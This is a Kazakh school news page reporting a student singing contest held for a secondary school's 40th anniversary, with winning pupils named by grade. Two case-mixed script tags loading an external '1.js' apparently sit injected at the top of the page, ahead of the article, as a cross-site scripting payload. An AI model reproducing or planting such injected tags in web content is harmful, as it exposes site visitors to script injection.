<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

16.03.2017

Ғ.Әбдірахманұлы атындағы Қима орта мектебіне 40 жыл толуына орай өткізілген «Мектеп-ұстаз» тақырыбына арналған ең үздік ән орындаушы атты байқау жайлы мәлімет

Атаулы мектептің биыл 40 жыл толуына орай «Мектеп-ұстаз» тақырыбына арналған ең үздік ән орындаушы атты байқау өткізілді. Байқауға 1-11 сынып оқушылары қатысты. Байқаудың ережесі бойынша оқушылар өз деңгейінде «Мектеп-ұстаз» тақырыбында әндер орындады.

Оқушылар байқау шарттарына сай дайындалған. Әнді орындау барысында нақышына келтіре орындады. Атап айтсақ; бастауыш сыныптар арасында Қуанышбай Нурай 4 сынып оқушысы жүлделі 1 орынға, Көпжасар Аяжан 3 сынып оқушысы 2 орынға, Жәңгір Айсұлу мен Балқожа Аружан 3 сынып оқушылары 3 орынға ие болды. 5-11 сынып оқушыларының арасында Блиспекова Перизат 8 сынып оқушысы мен Қайдуова Мадина 11 сынып оқушысы жүлделі 1 орынға, Қажымуратова Асем 5 сынып оқушысы 2 орынға, Дауренбекова Сандуғаш 6 сынып оқушысы мен Балқожа Аружан 3 орынға ие болды.

Мектебіміздің мерей тойына арналған «Мектеп-ұстаз» ән байқауына қатысушыларымызға мерейлерің үстем болсын демекпін.

Просмотров: 632


Пікір қосу



Деректерді қолтаңбаға қосу